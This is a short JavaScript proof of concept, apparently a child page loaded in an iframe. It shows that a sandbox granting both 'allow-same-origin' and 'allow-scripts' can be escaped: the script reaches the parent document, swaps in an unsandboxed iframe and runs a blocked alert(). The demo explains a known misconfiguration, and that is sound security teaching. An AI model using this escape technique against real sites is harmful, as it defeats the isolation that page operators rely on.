1.     if (window.top === this || window.parent === this) {
2.             let message = "This page is meant to be loaded from within an iframe to demonstrate you can bypass sandbox attribute, when a combination of 'allow-same-origin' and 'allow-scripts' is used.";
3.             document.body.innerText = message;
4.             throw new Error(message);
5.         }
6.  
7.     const illegalCode = () => {
8.         alert("You should not see me, because original iframe did not have 'allow-modals'. Kid page had allow-scripts and same-origin though. A new iframe without sandbox attribute was created - and here I am.");
9.     }
10.  
11.     const escape = () => {
12.         document.body.innerText = "Loaded into a frame.";
13.  
14.         let parent = window.parent;
15.         let container = parent.document.getElementById("escapeMe");
16.         if (parent.document.getElementById("escapeMe") != null) {
17.             // Recreate and insert an iframe without sandbox attribute that
18.             // plays by our rules.
19.             let replacement = parent.document.createElement("iframe");
20.             replacement.setAttribute("src", "kid.htm");
21.             replacement.setAttribute("id", "escapedAlready")
22.             parent.document.body.append(replacement);
23.  
24.             // Remove original iframe (avoid an infinite loop)
25.             container.parentNode.removeChild(container);
26.  
27.         } else {
28.             // Execute code that would be prevented by original iframe's sandbox.
29.             illegalCode();
30.         }
31.     }
32.  
33.     escape();